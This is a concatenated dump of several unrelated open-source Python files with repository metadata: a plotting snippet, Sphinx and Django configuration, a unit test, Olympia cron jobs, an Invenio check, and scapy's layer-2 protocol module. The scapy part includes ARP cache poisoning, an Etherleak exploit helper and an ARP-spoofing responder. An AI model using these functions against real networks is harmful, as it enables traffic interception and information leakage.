'\n[window_size={}, accuracy={:.1f}]'.format(n_window, accuracy),
fontsize=20, y=1.5)
plt.ylabel('Character List', fontsize=20)
plot = plt.imshow(pred_act.T, cmap=plt.get_cmap('plasma'))
fig.colorbar(plot, fraction=0.015, pad=0.04)
plt.xticks(np.arange(len(char_data)-1), list(char_raw)[:-1], fontsize=15)
plt.yticks(np.arange(len(char_list)), [idx_to_char[i] for i in range(len(char_list))], fontsize=15)
ax.xaxis.tick_top()
# Annotate
for i, idx in zip(range(len(pred_out)), pred_out):
annotation = idx_to_char[idx]
ax.annotate(annotation, xy=(i-0.2, idx+0.2), fontsize=12)
plt.show()
# f.savefig('result_' + idx + '.png')
|
jaekookang/useful_bits
|
Machine_Learning/RNN_LSTM/predict_character/rnn_char_windowing.py
|
Python
|
mit
| 7,262
| 0.006063
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# bitk3 documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import bitk3
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'BIoinformatics ToolKit 3'
copyright = u"2016, Davi Ortega"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = bitk3.__version__
# The full version, including alpha/beta/rc tags.
release = bitk3.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bitk3doc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'bitk3.tex',
u'BIoinformatics ToolKit 3 Documentation',
u'Davi Ortega', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bitk3',
u'BIoinformatics ToolKit 3 Documentation',
[u'Davi Ortega'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bitk3',
u'BIoinformatics ToolKit 3 Documentation',
u'Davi Ortega',
'bitk3',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
daviortega/bitk3
|
docs/conf.py
|
Python
|
mit
| 8,433
| 0.005336
|
from django.conf.urls import include, url
from demo.views import common
from demo.views.visadirect import fundstransfer, mvisa, reports, watchlist
from demo.views.pav import pav
from demo.views.dcas import cardinquiry
from demo.views.merchantsearch import search
from demo.views.paai.fundstransferattinq.cardattributes.fundstransferinquiry import funds_transfer_inquiry
from demo.views.paai.generalattinq.cardattributes.generalinquiry import general_inquiry
urlpatterns = [
url(r'^$', common.index),
# Payment Account Attributes Inquiry
url(r'^paai$', common.paai, name='paai'),
url(r'^paai/', include([
url(r'^fundstransferattinq/cardattributes/fundstransferinquiry$', funds_transfer_inquiry, name='paai_fti'),
url(r'^generalattinq/cardattributes/generalinquiry$', general_inquiry, name='paai_gi')
])),
# Merchant search
url(r'^merchantsearch$', common.merchantsearch, name='merchantsearch'),
url(r'^merchantsearch/', include([
url(r'^search$', search.merchant_search, name='merchantsearch_search'),
])),
# Payment account validation methods urls
url(r'^pav$', common.pav, name='pav'),
url(r'^pav/', include([
url(r'^cardvalidation$', pav.card_validation, name='pav_cardvalidation')
])),
# Digital card and account services
url(r'^dcas$', common.dcas, name='dcas'),
url(r'^dcas/', include([
url(r'^cardinquiry$', cardinquiry.debit_card_inquiry, name='dcas_debitcardinquiry')
])),
# VISA Direct methods urls
url(r'^visadirect$', common.visa_direct, name='vd'),
url(r'^visadirect/', include([
# FundsTransfer API
url(r'^fundstransfer$', fundstransfer.index, name='vd_ft'),
url(r'^fundstransfer/', include([
url(r'^pullfunds$', fundstransfer.pull, name='vd_ft_pullfunds'),
url(r'^pushfunds$', fundstransfer.push, name='vd_ft_pushfunds'),
url(r'^reversefunds$', fundstransfer.reverse, name='vd_ft_reversefunds'),
])),
# mVISA API
url(r'^mvisa$', mvisa.index, name='vd_mvisa'),
url(r'^mvisa/', include([
url(r'^cashinpushpayments$', mvisa.cipp, name='vd_mvisa_cipp'),
url(r'^cashoutpushpayments$', mvisa.copp, name='vd_mvisa_copp'),
url(r'^merchantpushpayments$', mvisa.mpp, name='vd_mvisa_mpp'),
])),
# Reports API
url(r'^reports$', reports.index, name='vd_reports'),
url(r'^reports/', include([
url(r'^transactiondata$', reports.transactiondata, name='vd_reports_transactiondata'),
])),
# WatchList Inquiry methods urls
url(r'^watchlist$', watchlist.index, name='vd_wl'),
url(r'^watchlist/', include([
url(r'^inquiry$', watchlist.inquiry, name='vd_wl_inquiry')
]))
])),
]
|
ppokrovsky/pyvdp
|
demo/demo/urls.py
|
Python
|
mit
| 2,820
| 0.002837
|
import sys
if '' not in sys.path:
sys.path.append('')
import time
import unittest
from pyactors.logs import file_logger
from pyactors.exceptions import EmptyInboxException
from tests import ForkedGreActor as TestActor
from multiprocessing import Manager
class ForkedGreenletActorTest(unittest.TestCase):
def test_run(self):
''' test_forked_green_actors.test_run
'''
test_name = 'test_forked_gen_actors.test_run'
logger = file_logger(test_name, filename='logs/%s.log' % test_name)
actor = TestActor()
actor.start()
while actor.processing:
time.sleep(0.1)
actor.stop()
result = []
while True:
try:
result.append(actor.inbox.get())
except EmptyInboxException:
break
self.assertEqual(len(result), 10)
self.assertEqual(actor.processing, False)
self.assertEqual(actor.waiting, False)
if __name__ == '__main__':
unittest.main()
|
snakeego/pyactors
|
tests/test_forked_green_actors.py
|
Python
|
bsd-2-clause
| 1,024
| 0.003906
|
from django import forms
from django_roa_client.models import RemotePage, RemotePageWithRelations
class TestForm(forms.Form):
test_field = forms.CharField()
remote_page = forms.ModelChoiceField(queryset=RemotePage.objects.all())
class RemotePageForm(forms.ModelForm):
class Meta:
model = RemotePage
class RemotePageWithRelationsForm(forms.ModelForm):
class Meta:
model = RemotePageWithRelations
|
charles-vdulac/django-roa
|
examples/django_roa_client/forms.py
|
Python
|
bsd-3-clause
| 432
| 0.002315
|
from datetime import datetime, timedelta
from django.core.files.storage import default_storage as storage
import olympia.core.logger
from olympia import amo
from olympia.activity.models import ActivityLog
from olympia.addons.models import Addon
from olympia.addons.tasks import delete_addons
from olympia.amo.utils import chunked
from olympia.files.models import FileUpload
from olympia.scanners.models import ScannerResult
from olympia.amo.models import FakeEmail
from . import tasks
from .sitemap import (
get_sitemap_path,
get_sitemaps,
get_sitemap_section_pages,
render_index_xml,
)
log = olympia.core.logger.getLogger('z.cron')
def gc(test_result=True):
"""Site-wide garbage collections."""
def days_ago(days):
return datetime.today() - timedelta(days=days)
log.info('Collecting data to delete')
logs = (
ActivityLog.objects.filter(created__lt=days_ago(90))
.exclude(action__in=amo.LOG_KEEP)
.values_list('id', flat=True)
)
for chunk in chunked(logs, 100):
tasks.delete_logs.delay(chunk)
two_weeks_ago = days_ago(15)
# Hard-delete stale add-ons with no versions. No email should be sent.
versionless_addons = Addon.unfiltered.filter(
versions__pk=None, created__lte=two_weeks_ago
).values_list('pk', flat=True)
for chunk in chunked(versionless_addons, 100):
delete_addons.delay(chunk, with_deleted=True)
# Delete stale FileUploads.
stale_uploads = FileUpload.objects.filter(created__lte=two_weeks_ago).order_by('id')
for file_upload in stale_uploads:
log.info(
'[FileUpload:{uuid}] Removing file: {path}'.format(
uuid=file_upload.uuid, path=file_upload.path
)
)
if file_upload.path:
try:
storage.delete(file_upload.path)
except OSError:
pass
file_upload.delete()
# Delete stale ScannerResults.
ScannerResult.objects.filter(upload=None, version=None).delete()
# Delete fake emails older than 90 days
FakeEmail.objects.filter(created__lte=days_ago(90)).delete()
def write_sitemaps(section=None, app_name=None):
index_url = get_sitemap_path(None, None)
sitemaps = get_sitemaps()
if (not section or section == 'index') and not app_name:
with storage.open(index_url, 'w') as index_file:
log.info('Writing sitemap index')
index_file.write(render_index_xml(sitemaps))
for _section, _app_name, _page in get_sitemap_section_pages(sitemaps):
if (section and section != _section) or (app_name and app_name != _app_name):
continue
if _page % 1000 == 1:
# log an info message every 1000 pages in a _section, _app_name
log.info(f'Writing sitemap file for {_section}, {_app_name}, {_page}')
filename = get_sitemap_path(_section, _app_name, _page)
with storage.open(filename, 'w') as sitemap_file:
sitemap_object = sitemaps.get((_section, amo.APPS.get(_app_name)))
if not sitemap_object:
continue
content = sitemap_object.render(app_name=_app_name, page=_page)
sitemap_file.write(content)
|
mozilla/olympia
|
src/olympia/amo/cron.py
|
Python
|
bsd-3-clause
| 3,247
| 0.000924
|
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
__revision__ = "$Id$"
import os
import re
from invenio.dbquery import run_sql
from invenio.websubmit_config import InvenioWebSubmitFunctionStop
def Check_Group(parameters, curdir, form, user_info=None):
"""
Check that a group exists.
Read from file "/curdir/Group"
If the group does not exist, switch to page 1, step 0
"""
#Path of file containing group
if os.path.exists("%s/%s" % (curdir,'Group')):
fp = open("%s/%s" % (curdir,'Group'),"r")
group = fp.read()
group = group.replace("/","_")
group = re.sub("[\n\r]+","",group)
res = run_sql ("""SELECT id FROM usergroup WHERE name = %s""", (group,))
if len(res) == 0:
raise InvenioWebSubmitFunctionStop("""
<SCRIPT>
document.forms[0].action="/submit";
document.forms[0].curpage.value = 1;
document.forms[0].step.value = 0;
user_must_confirm_before_leaving_page = false;
document.forms[0].submit();
alert('The given group name (%s) is invalid.');
</SCRIPT>""" % (group,))
else:
raise InvenioWebSubmitFunctionStop("""
<SCRIPT>
document.forms[0].action="/submit";
document.forms[0].curpage.value = 1;
document.forms[0].step.value = 0;
user_must_confirm_before_leaving_page = false;
document.forms[0].submit();
alert('The given group name (%s) is invalid.');
</SCRIPT>""" % (group,))
return ""
|
lbjay/cds-invenio
|
modules/websubmit/lib/functions/Check_Group.py
|
Python
|
gpl-2.0
| 2,200
| 0.010455
|
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
"""
Classes and functions for layer 2 protocols.
"""
import os,struct,time
from scapy.base_classes import Net
from scapy.config import conf
from scapy.packet import *
from scapy.ansmachine import *
from scapy.plist import SndRcvList
from scapy.fields import *
from scapy.sendrecv import srp,srp1
from scapy.arch import get_if_hwaddr
#################
## Tools ##
#################
class Neighbor:
def __init__(self):
self.resolvers = {}
def register_l3(self, l2, l3, resolve_method):
self.resolvers[l2,l3]=resolve_method
def resolve(self, l2inst, l3inst):
k = l2inst.__class__,l3inst.__class__
if k in self.resolvers:
return self.resolvers[k](l2inst,l3inst)
def __repr__(self):
return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2,l3 in self.resolvers)
conf.neighbor = Neighbor()
conf.netcache.new_cache("arp_cache", 120) # cache entries expire after 120s
@conf.commands.register
def getmacbyip(ip, chainCC=0):
"""Return MAC address corresponding to a given IP address"""
if isinstance(ip,Net):
ip = next(iter(ip))
ip = inet_ntoa(inet_aton(ip))
tmp = inet_aton(ip)
if (tmp[0] & 0xf0) == 0xe0: # mcast @
return "01:00:5e:%.2x:%.2x:%.2x" % (tmp[1]&0x7f,tmp[2],tmp[3])
iff,a,gw = conf.route.route(ip)
if ( (iff == "lo") or (ip == conf.route.get_if_bcast(iff)) ):
return "ff:ff:ff:ff:ff:ff"
if gw != "0.0.0.0":
ip = gw
mac = conf.netcache.arp_cache.get(ip)
if mac:
return mac
res = srp1(Ether(dst=ETHER_BROADCAST)/ARP(op="who-has", pdst=ip),
type=ETH_P_ARP,
iface = iff,
timeout=2,
verbose=0,
chainCC=chainCC,
nofilter=1)
if res is not None:
mac = res.payload.hwsrc
conf.netcache.arp_cache[ip] = mac
return mac
return None
### Fields
class DestMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
class SourceMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
class ARPSourceMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
### Layers
ETHER_TYPES['802_AD'] = 0x88a8
class Ether(Packet):
name = "Ethernet"
fields_desc = [ MACField("dst","00:00:00:01:00:00"),
MACField("src","00:00:00:02:00:00"),
XShortEnumField("type", 0x9000, ETHER_TYPES) ]
def hashret(self):
return struct.pack("H",self.type)+self.payload.hashret()
def answers(self, other):
if isinstance(other,Ether):
if self.type == other.type:
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return self.sprintf("%src% > %dst% (%type%)")
@classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] <= 1500:
return Dot3
return cls
class Dot3(Packet):
name = "802.3"
fields_desc = [ DestMACField("dst"),
MACField("src", ETHER_ANY),
LenField("len", None, "H") ]
def extract_padding(self,s):
l = self.len
return s[:l],s[l:]
def answers(self, other):
if isinstance(other,Dot3):
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return "802.3 %s > %s" % (self.src, self.dst)
@classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] > 1500:
return Ether
return cls
class LLC(Packet):
name = "LLC"
fields_desc = [ XByteField("dsap", 0x00),
XByteField("ssap", 0x00),
ByteField("ctrl", 0) ]
conf.neighbor.register_l3(Ether, LLC, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
conf.neighbor.register_l3(Dot3, LLC, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class CookedLinux(Packet):
name = "cooked linux"
fields_desc = [ ShortEnumField("pkttype",0, {0: "unicast",
4:"sent-by-us"}), #XXX incomplete
XShortField("lladdrtype",512),
ShortField("lladdrlen",0),
StrFixedLenField("src","",8),
XShortEnumField("proto",0x800,ETHER_TYPES) ]
class SNAP(Packet):
name = "SNAP"
fields_desc = [ X3BytesField("OUI",0x000000),
XShortEnumField("code", 0x000, ETHER_TYPES) ]
conf.neighbor.register_l3(Dot3, SNAP, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class Dot1Q(Packet):
name = "802.1Q"
aliastypes = [ Ether ]
fields_desc = [ BitField("prio", 0, 3),
BitField("id", 0, 1),
BitField("vlan", 1, 12),
XShortEnumField("type", 0x0000, ETHER_TYPES) ]
def answers(self, other):
if isinstance(other,Dot1Q):
if ( (self.type == other.type) and
(self.vlan == other.vlan) ):
return self.payload.answers(other.payload)
else:
return self.payload.answers(other)
return 0
def default_payload_class(self, pay):
if self.type <= 1500:
return LLC
return conf.raw_layer
def extract_padding(self,s):
if self.type <= 1500:
return s[:self.type],s[self.type:]
return s,None
def mysummary(self):
if isinstance(self.underlayer, Ether):
return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%")
else:
return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")
conf.neighbor.register_l3(Ether, Dot1Q, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class STP(Packet):
name = "Spanning Tree Protocol"
fields_desc = [ ShortField("proto", 0),
ByteField("version", 0),
ByteField("bpdutype", 0),
ByteField("bpduflags", 0),
ShortField("rootid", 0),
MACField("rootmac", ETHER_ANY),
IntField("pathcost", 0),
ShortField("bridgeid", 0),
MACField("bridgemac", ETHER_ANY),
ShortField("portid", 0),
BCDFloatField("age", 1),
BCDFloatField("maxage", 20),
BCDFloatField("hellotime", 2),
BCDFloatField("fwddelay", 15) ]
class EAPOL(Packet):
name = "EAPOL"
fields_desc = [ ByteField("version", 1),
ByteEnumField("type", 0, ["EAP_PACKET", "START", "LOGOFF", "KEY", "ASF"]),
LenField("len", None, "H") ]
EAP_PACKET= 0
START = 1
LOGOFF = 2
KEY = 3
ASF = 4
def extract_padding(self, s):
l = self.len
return s[:l],s[l:]
def hashret(self):
#return chr(self.type)+self.payload.hashret()
return bytes([self.type])+self.payload.hashret()
def answers(self, other):
if isinstance(other,EAPOL):
if ( (self.type == self.EAP_PACKET) and
(other.type == self.EAP_PACKET) ):
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return self.sprintf("EAPOL %EAPOL.type%")
class EAP(Packet):
name = "EAP"
fields_desc = [ ByteEnumField("code", 4, {1:"REQUEST",2:"RESPONSE",3:"SUCCESS",4:"FAILURE"}),
ByteField("id", 0),
ShortField("len",None),
ConditionalField(ByteEnumField("type",0, {1:"ID",4:"MD5"}), lambda pkt:pkt.code not in [EAP.SUCCESS, EAP.FAILURE])
]
REQUEST = 1
RESPONSE = 2
SUCCESS = 3
FAILURE = 4
TYPE_ID = 1
TYPE_MD5 = 4
def answers(self, other):
if isinstance(other,EAP):
if self.code == self.REQUEST:
return 0
elif self.code == self.RESPONSE:
if ( (other.code == self.REQUEST) and
(other.type == self.type) ):
return 1
elif other.code == self.RESPONSE:
return 1
return 0
def post_build(self, p, pay):
if self.len is None:
l = len(p)+len(pay)
p = p[:2]+bytes([((l>>8)&0xff),(l&0xff)])+p[4:]
return p+pay
class ARP(Packet):
name = "ARP"
fields_desc = [ XShortField("hwtype", 0x0001),
XShortEnumField("ptype", 0x0800, ETHER_TYPES),
ByteField("hwlen", 6),
ByteField("plen", 4),
ShortEnumField("op", 1, {"who-has":1, "is-at":2, "RARP-req":3, "RARP-rep":4, "Dyn-RARP-req":5, "Dyn-RAR-rep":6, "Dyn-RARP-err":7, "InARP-req":8, "InARP-rep":9}),
ARPSourceMACField("hwsrc"),
SourceIPField("psrc","pdst"),
MACField("hwdst", ETHER_ANY),
IPField("pdst", "0.0.0.0") ]
who_has = 1
is_at = 2
def answers(self, other):
if isinstance(other,ARP):
if ( (self.op == self.is_at) and
(other.op == self.who_has) and
(self.psrc == other.pdst) ):
return 1
return 0
def route(self):
dst = self.pdst
if isinstance(dst,Gen):
dst = next(iter(dst))
return conf.route.route(dst)
def extract_padding(self, s):
return b"",s
def mysummary(self):
if self.op == self.is_at:
return self.sprintf("ARP is at %hwsrc% says %psrc%")
elif self.op == self.who_has:
return self.sprintf("ARP who has %pdst% says %psrc%")
else:
return self.sprintf("ARP %op% %psrc% > %pdst%")
conf.neighbor.register_l3(Ether, ARP, lambda l2,l3: getmacbyip(l3.pdst))
class GRErouting(Packet):
name = "GRE routing informations"
fields_desc = [ ShortField("address_family",0),
ByteField("SRE_offset", 0),
FieldLenField("SRE_len", None, "routing_info", "B"),
StrLenField("routing_info", "", "SRE_len"),
]
class GRE(Packet):
name = "GRE"
fields_desc = [ BitField("chksum_present",0,1),
BitField("routing_present",0,1),
BitField("key_present",0,1),
BitField("seqnum_present",0,1),
BitField("strict_route_source",0,1),
BitField("recursion_control",0,3),
BitField("flags",0,5),
BitField("version",0,3),
XShortEnumField("proto", 0x0000, ETHER_TYPES),
ConditionalField(XShortField("chksum",None), lambda pkt:pkt.chksum_present==1 or pkt.routing_present==1),
ConditionalField(XShortField("offset",None), lambda pkt:pkt.chksum_present==1 or pkt.routing_present==1),
ConditionalField(XIntField("key",None), lambda pkt:pkt.key_present==1),
ConditionalField(XIntField("seqence_number",None), lambda pkt:pkt.seqnum_present==1),
]
def post_build(self, p, pay):
p += pay
if self.chksum_present and self.chksum is None:
c = checksum(p)
p = p[:4]+bytes([((c>>8)&0xff),(c&0xff)])+p[6:]
return p
class Dot1AD(Dot1Q):
name = '802_1AD'
bind_layers( Dot3, LLC, )
bind_layers( Ether, LLC, type=122)
bind_layers( Ether, Dot1Q, type=33024)
bind_layers( Ether, Dot1AD, type=0x88a8)
bind_layers( Dot1AD, Dot1AD, type=0x88a8)
bind_layers( Dot1AD, Dot1Q, type=0x8100)
bind_layers( Dot1Q, Dot1AD, type=0x88a8)
bind_layers( Ether, Ether, type=1)
bind_layers( Ether, ARP, type=2054)
bind_layers( Ether, EAPOL, type=34958)
bind_layers( Ether, EAPOL, dst='01:80:c2:00:00:03', type=34958)
bind_layers( CookedLinux, LLC, proto=122)
bind_layers( CookedLinux, Dot1Q, proto=33024)
bind_layers( CookedLinux, Ether, proto=1)
bind_layers( CookedLinux, ARP, proto=2054)
bind_layers( CookedLinux, EAPOL, proto=34958)
bind_layers( GRE, LLC, proto=122)
bind_layers( GRE, Dot1Q, proto=33024)
bind_layers( GRE, Ether, proto=1)
bind_layers( GRE, ARP, proto=2054)
bind_layers( GRE, EAPOL, proto=34958)
bind_layers( GRE, GRErouting, { "routing_present" : 1 } )
bind_layers( GRErouting, conf.raw_layer,{ "address_family" : 0, "SRE_len" : 0 })
bind_layers( GRErouting, GRErouting, { } )
bind_layers( EAPOL, EAP, type=0)
bind_layers( LLC, STP, dsap=66, ssap=66, ctrl=3)
bind_layers( LLC, SNAP, dsap=170, ssap=170, ctrl=3)
bind_layers( SNAP, Dot1Q, code=33024)
bind_layers( SNAP, Ether, code=1)
bind_layers( SNAP, ARP, code=2054)
bind_layers( SNAP, EAPOL, code=34958)
bind_layers( SNAP, STP, code=267)
conf.l2types.register(ARPHDR_ETHER, Ether)
conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether)
conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether)
conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3)
conf.l2types.register(144, CookedLinux) # called LINUX_IRDA, similar to CookedLinux
conf.l2types.register(113, CookedLinux)
conf.l3types.register(ETH_P_ARP, ARP)
### Technics
@conf.commands.register
def arpcachepoison(target, victim, interval=60):
"""Poison target's cache with (your MAC,victim's IP) couple
arpcachepoison(target, victim, [interval=60]) -> None
"""
tmac = getmacbyip(target)
p = Ether(dst=tmac)/ARP(op="who-has", psrc=victim, pdst=target)
try:
while 1:
sendp(p, iface_hint=target)
if conf.verb > 1:
os.write(1,b".")
time.sleep(interval)
except KeyboardInterrupt:
pass
class ARPingResult(SndRcvList):
def __init__(self, res=None, name="ARPing", stats=None):
SndRcvList.__init__(self, res, name, stats)
def show(self):
for s,r in self.res:
print(r.sprintf("%19s,Ether.src% %ARP.psrc%"))
@conf.commands.register
def arping(net, timeout=2, cache=0, verbose=None, **kargs):
"""Send ARP who-has requests to determine which hosts are up
arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None
Set cache=True if you want arping to modify internal ARP-Cache"""
if verbose is None:
verbose = conf.verb
ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=net), verbose=verbose,
filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs)
ans = ARPingResult(ans.res)
if cache and ans is not None:
for pair in ans:
conf.netcache.arp_cache[pair[1].psrc] = (pair[1].hwsrc, time.time())
if verbose:
ans.show()
return ans,unans
@conf.commands.register
def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00",**kargs):
"""Try to guess if target is in Promisc mode. The target is provided by its ip."""
responses = srp1(Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip),type=ETH_P_ARP, iface_hint=ip, timeout=1, verbose=0,**kargs)
return responses is not None
@conf.commands.register
def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs):
"""Send ARP who-has requests to determine which hosts are in promiscuous mode
promiscping(net, iface=conf.iface)"""
ans,unans = srp(Ether(dst=fake_bcast)/ARP(pdst=net),
filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs)
ans = ARPingResult(ans.res, name="PROMISCPing")
ans.display()
return ans,unans
class ARP_am(AnsweringMachine):
function_name="farpd"
filter = "arp"
send_function = staticmethod(sendp)
def parse_options(self, IP_addr=None, iface=None, ARP_addr=None):
self.IP_addr=IP_addr
self.iface=iface
self.ARP_addr=ARP_addr
def is_request(self, req):
return (req.haslayer(ARP) and
req.getlayer(ARP).op == 1 and
(self.IP_addr == None or self.IP_addr == req.getlayer(ARP).pdst))
def make_reply(self, req):
ether = req.getlayer(Ether)
arp = req.getlayer(ARP)
iff,a,gw = conf.route.route(arp.psrc)
if self.iface != None:
iff = iface
ARP_addr = self.ARP_addr
IP_addr = arp.pdst
resp = Ether(dst=ether.src,
src=ARP_addr)/ARP(op="is-at",
hwsrc=ARP_addr,
psrc=IP_addr,
hwdst=arp.hwsrc,
pdst=arp.pdst)
return resp
def sniff(self):
sniff(iface=self.iface, **self.optsniff)
@conf.commands.register
def etherleak(target, **kargs):
"""Exploit Etherleak flaw"""
return srpflood(Ether()/ARP(pdst=target),
prn=lambda a: conf.padding_layer in a[1] and hexstr(a[1][conf.padding_layer].load),
filter="arp", **kargs)
|
kisel/trex-core
|
scripts/external_libs/scapy-2.3.1/python3/scapy/layers/l2.py
|
Python
|
apache-2.0
| 17,955
| 0.017154
|
